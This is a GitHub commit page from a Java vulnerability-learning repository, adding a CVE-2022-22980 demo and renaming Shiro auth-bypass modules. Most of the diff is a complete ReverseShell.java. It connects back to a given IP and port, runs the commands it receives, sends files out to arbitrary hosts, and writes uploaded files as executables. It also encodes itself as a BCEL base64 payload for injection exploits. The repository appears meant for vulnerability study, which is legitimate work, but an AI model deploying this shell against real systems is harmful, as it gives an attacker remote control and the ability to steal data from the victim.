Skip to content

Commit e3b6694

Browse files
author
threedr3am
committed
add CVE-2022-22980 Learning Demo
1 parent 2f802e6 commit e3b6694

File tree

43 files changed

+434
-152
lines changed

Some content is hidden

Large Commits have some content hidden by default. Use the searchbox below for content that may be hidden.

43 files changed

+434
-152
lines changed

common/src/main/java/ReverseShell.java

Lines changed: 103 additions & 99 deletions
Original file line numberDiff line numberDiff line change
@@ -15,113 +15,117 @@
1515

1616
public class ReverseShell implements Runnable {
1717

18-
private String ip;
19-
private Integer port;
18+
private String ip;
19+
private Integer port;
2020

21-
private InputStream inputStream;
22-
private OutputStream outputStream;
21+
private InputStream inputStream;
22+
private OutputStream outputStream;
2323

24-
public ReverseShell(String ip, Integer port) {
25-
this.ip = ip;
26-
this.port = port;
27-
new Thread(this).start();
28-
}
29-
30-
public ReverseShell(InputStream inputStream, OutputStream outputStream) {
31-
this.inputStream = inputStream;
32-
this.outputStream = outputStream;
33-
new Thread(this).start();
34-
}
24+
public ReverseShell(String ip, Integer port) {
25+
this.ip = ip;
26+
this.port = port;
27+
new Thread(this).start();
28+
}
3529

36-
@Override
37-
public void run() {
38-
if (outputStream != null && inputStream != null) {
39-
try {
40-
BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream));
41-
BufferedReader read = new BufferedReader(new InputStreamReader(inputStream));
42-
String line2;
43-
while ((line2 = read.readLine()) != null) {
44-
bufferedWriter.write(line2);
45-
bufferedWriter.newLine();
46-
bufferedWriter.flush();
47-
}
48-
} catch (Exception e) {}
49-
} else {
50-
try {
51-
Socket socket = new Socket(ip, port);
52-
BufferedWriter bufferedWriter = new BufferedWriter(
53-
new OutputStreamWriter(socket.getOutputStream()));
54-
bufferedWriter.write("success!");
55-
bufferedWriter.newLine();
56-
bufferedWriter.flush();
30+
public ReverseShell(InputStream inputStream, OutputStream outputStream) {
31+
this.inputStream = inputStream;
32+
this.outputStream = outputStream;
33+
new Thread(this).start();
34+
}
5735

58-
BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(socket.getInputStream()));
59-
while (true) {
60-
String line = bufferedReader.readLine();
61-
if (line.equals("exit"))
62-
return;
63-
Process pro = null;
64-
try {
65-
if (line.startsWith("${IFS}")) {
66-
line = line.substring(6);
67-
String[] cmd = line.split("\\$\\{IFS\\}");
68-
pro = Runtime.getRuntime().exec(cmd);
69-
} else if (line.startsWith("download")) {
70-
line = line.substring(8).trim();
71-
String[] cmd = line.split(" ");
72-
String file = cmd[0];
73-
String ip = cmd[1];
74-
String port = cmd[2];
75-
byte[] bytes = Files.readAllBytes(Paths.get(file));
76-
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
77-
transferFileSocket.getOutputStream().write(bytes);
78-
transferFileSocket.getOutputStream().flush();
79-
transferFileSocket.getOutputStream().close();
80-
transferFileSocket.close();
81-
} else if (line.startsWith("upload")) {
82-
line = line.substring(6).trim();
83-
String[] cmd = line.split(" ");
84-
String file = cmd[0];
85-
String ip = cmd[1];
86-
String port = cmd[2];
87-
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
88-
InputStream inputStream = transferFileSocket.getInputStream();
89-
Path path = Paths.get(file);
90-
Files.copy(inputStream, path);
91-
if (Files.exists(path)) {
92-
File toSetFile = path.toFile();
93-
toSetFile.setExecutable(true);
94-
toSetFile.setReadable(true);
95-
toSetFile.setWritable(true);
96-
}
97-
inputStream.close();
98-
transferFileSocket.close();
99-
} else {
100-
pro = Runtime.getRuntime().exec(line);
101-
}
102-
} catch (Exception e) {
103-
bufferedWriter.write(e.getMessage());
104-
bufferedWriter.newLine();
105-
bufferedWriter.flush();
106-
}
107-
if (pro == null) {
108-
continue;
109-
}
36+
@Override
37+
public void run() {
38+
if (outputStream != null && inputStream != null) {
39+
try {
40+
BufferedWriter bufferedWriter = new BufferedWriter(new OutputStreamWriter(outputStream));
41+
BufferedReader read = new BufferedReader(new InputStreamReader(inputStream));
42+
String line2;
43+
while ((line2 = read.readLine()) != null) {
44+
bufferedWriter.write(line2);
45+
bufferedWriter.newLine();
46+
bufferedWriter.flush();
47+
}
48+
} catch (Exception e) {
49+
}
50+
} else {
51+
try {
52+
Socket socket = new Socket(ip, port);
53+
BufferedWriter bufferedWriter = new BufferedWriter(
54+
new OutputStreamWriter(socket.getOutputStream()));
55+
bufferedWriter.write("success!");
56+
bufferedWriter.newLine();
57+
bufferedWriter.flush();
11058

111-
new ReverseShell(pro.getInputStream(), socket.getOutputStream());
112-
new ReverseShell(pro.getErrorStream(), socket.getOutputStream());
113-
}
59+
BufferedReader bufferedReader = new BufferedReader(
60+
new InputStreamReader(socket.getInputStream()));
61+
while (true) {
62+
String line = bufferedReader.readLine();
63+
if (line.equals("exit")) {
64+
return;
65+
}
66+
Process pro = null;
67+
try {
68+
if (line.startsWith("${IFS}")) {
69+
line = line.substring(6);
70+
String[] cmd = line.split("\\$\\{IFS\\}");
71+
pro = Runtime.getRuntime().exec(cmd);
72+
} else if (line.startsWith("download")) {
73+
line = line.substring(8).trim();
74+
String[] cmd = line.split(" ");
75+
String file = cmd[0];
76+
String ip = cmd[1];
77+
String port = cmd[2];
78+
byte[] bytes = Files.readAllBytes(Paths.get(file));
79+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
80+
transferFileSocket.getOutputStream().write(bytes);
81+
transferFileSocket.getOutputStream().flush();
82+
transferFileSocket.getOutputStream().close();
83+
transferFileSocket.close();
84+
} else if (line.startsWith("upload")) {
85+
line = line.substring(6).trim();
86+
String[] cmd = line.split(" ");
87+
String file = cmd[0];
88+
String ip = cmd[1];
89+
String port = cmd[2];
90+
Socket transferFileSocket = new Socket(ip, Integer.parseInt(port));
91+
InputStream inputStream = transferFileSocket.getInputStream();
92+
Path path = Paths.get(file);
93+
Files.copy(inputStream, path);
94+
if (Files.exists(path)) {
95+
File toSetFile = path.toFile();
96+
toSetFile.setExecutable(true);
97+
toSetFile.setReadable(true);
98+
toSetFile.setWritable(true);
99+
}
100+
inputStream.close();
101+
transferFileSocket.close();
102+
} else {
103+
pro = Runtime.getRuntime().exec(line);
104+
}
105+
} catch (Exception e) {
106+
bufferedWriter.write(e.getMessage());
107+
bufferedWriter.newLine();
108+
bufferedWriter.flush();
109+
}
110+
if (pro == null) {
111+
continue;
112+
}
114113

115-
} catch (IOException e) {}
114+
new ReverseShell(pro.getInputStream(), socket.getOutputStream());
115+
new ReverseShell(pro.getErrorStream(), socket.getOutputStream());
116116
}
117+
118+
} catch (IOException e) {
119+
}
117120
}
121+
}
118122

119-
public static void main(String[] args) throws Exception {
120-
InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class");
121-
byte[] bytes = new byte[inputStream.available()];
122-
inputStream.read(bytes);
123-
String code = Utility.encode(bytes, true);
124-
System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes()));
123+
public static void main(String[] args) throws Exception {
124+
InputStream inputStream = ReverseShell.class.getResourceAsStream("ReverseShell.class");
125+
byte[] bytes = new byte[inputStream.available()];
126+
inputStream.read(bytes);
127+
String code = Utility.encode(bytes, true);
128+
System.out.println(Base64.getEncoder().encodeToString(("$$BCEL$$" + code).getBytes()));
125129
// new ReverseShell("127.0.0.1", 12345);
126-
}
130+
}
127131
}

pom.xml

Lines changed: 35 additions & 46 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,7 @@
11
<?xml version="1.0" encoding="UTF-8"?>
22

3-
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
3+
<project xmlns="http://maven.apache.org/POM/4.0.0"
4+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
45
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
56
<modelVersion>4.0.0</modelVersion>
67

@@ -27,7 +28,6 @@
2728
<module>nexus</module>
2829
<module>apache-poi</module>
2930
<module>java-compile</module>
30-
<module>auth-bypass(shiro=1.7.1)</module>
3131
</modules>
3232

3333
<name>learn-java-bug</name>
@@ -56,56 +56,45 @@
5656
</dependency>
5757

5858

59-
<!-- <dependency>-->
60-
<!-- <groupId>com.google.guava</groupId>-->
61-
<!-- <artifactId>guava</artifactId>-->
62-
<!-- <version>26.0-jre</version>-->
63-
<!-- </dependency>-->
59+
<!-- <dependency>-->
60+
<!-- <groupId>com.google.guava</groupId>-->
61+
<!-- <artifactId>guava</artifactId>-->
62+
<!-- <version>26.0-jre</version>-->
63+
<!-- </dependency>-->
6464

6565

6666
<!-- Javaee API -->
67-
<!-- <dependency>-->
68-
<!-- <groupId>javax</groupId>-->
69-
<!-- <artifactId>javaee-api</artifactId>-->
70-
<!-- <version>6.0</version>-->
71-
<!-- </dependency>-->
72-
73-
74-
75-
76-
77-
67+
<!-- <dependency>-->
68+
<!-- <groupId>javax</groupId>-->
69+
<!-- <artifactId>javaee-api</artifactId>-->
70+
<!-- <version>6.0</version>-->
71+
<!-- </dependency>-->
7872

7973

8074
<!-- hibernate -->
81-
<!-- <dependency>-->
82-
<!-- <groupId>org.hibernate</groupId>-->
83-
<!-- <artifactId>hibernate</artifactId>-->
84-
<!-- <version>3.2.1.ga</version>-->
85-
<!-- <exclusions>-->
86-
<!-- <exclusion>-->
87-
<!-- <groupId>javax.transaction</groupId>-->
88-
<!-- <artifactId>jta</artifactId>-->
89-
<!-- </exclusion>-->
90-
<!-- <exclusion>-->
91-
<!-- <groupId>asm</groupId>-->
92-
<!-- <artifactId>asm</artifactId>-->
93-
<!-- </exclusion>-->
94-
<!-- <exclusion>-->
95-
<!-- <groupId>asm</groupId>-->
96-
<!-- <artifactId>asm-attrs</artifactId>-->
97-
<!-- </exclusion>-->
98-
<!-- <exclusion>-->
99-
<!-- <groupId>cglib</groupId>-->
100-
<!-- <artifactId>cglib</artifactId>-->
101-
<!-- </exclusion>-->
102-
<!-- </exclusions>-->
103-
<!-- </dependency>-->
104-
105-
106-
107-
108-
75+
<!-- <dependency>-->
76+
<!-- <groupId>org.hibernate</groupId>-->
77+
<!-- <artifactId>hibernate</artifactId>-->
78+
<!-- <version>3.2.1.ga</version>-->
79+
<!-- <exclusions>-->
80+
<!-- <exclusion>-->
81+
<!-- <groupId>javax.transaction</groupId>-->
82+
<!-- <artifactId>jta</artifactId>-->
83+
<!-- </exclusion>-->
84+
<!-- <exclusion>-->
85+
<!-- <groupId>asm</groupId>-->
86+
<!-- <artifactId>asm</artifactId>-->
87+
<!-- </exclusion>-->
88+
<!-- <exclusion>-->
89+
<!-- <groupId>asm</groupId>-->
90+
<!-- <artifactId>asm-attrs</artifactId>-->
91+
<!-- </exclusion>-->
92+
<!-- <exclusion>-->
93+
<!-- <groupId>cglib</groupId>-->
94+
<!-- <artifactId>cglib</artifactId>-->
95+
<!-- </exclusion>-->
96+
<!-- </exclusions>-->
97+
<!-- </dependency>-->
10998

11099

111100
</dependencies>

shiro/auth-bypass(shiro<=1.4.1)/pom.xml renamed to shiro/auth-bypass-shiro-1-4-1/pom.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010
</parent>
1111

1212
<modelVersion>4.0.0</modelVersion>
13-
<artifactId>auth-bypass-shiro-1.4.1</artifactId>
13+
<artifactId>auth-bypass-shiro-1-4-1</artifactId>
1414
<build>
1515
<plugins>
1616
<plugin>

shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java renamed to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java

File renamed without changes.

shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java renamed to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/config/ShiroConfig.java

File renamed without changes.

shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java renamed to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/BypassTestController.java

File renamed without changes.

shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java renamed to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/controller/LoginController.java

File renamed without changes.

shiro/auth-bypass(shiro<1.5.2)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java renamed to shiro/auth-bypass-shiro-1-4-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/realm/MyRealm.java

File renamed without changes.

shiro/auth-bypass(shiro<1.5.2)/pom.xml renamed to shiro/auth-bypass-shiro-1-5-1/pom.xml

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -10,7 +10,7 @@
1010
</parent>
1111

1212
<modelVersion>4.0.0</modelVersion>
13-
<artifactId>auth-bypass-cve-2020-1957</artifactId>
13+
<artifactId>auth-bypass-shiro-1-5-1</artifactId>
1414
<build>
1515
<plugins>
1616
<plugin>

shiro/auth-bypass(shiro<=1.4.1)/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java renamed to shiro/auth-bypass-shiro-1-5-1/src/main/java/com/threedr3am/bug/shiro/bypass/auth/Application.java

File renamed without changes.

0 commit comments

Comments
 (0)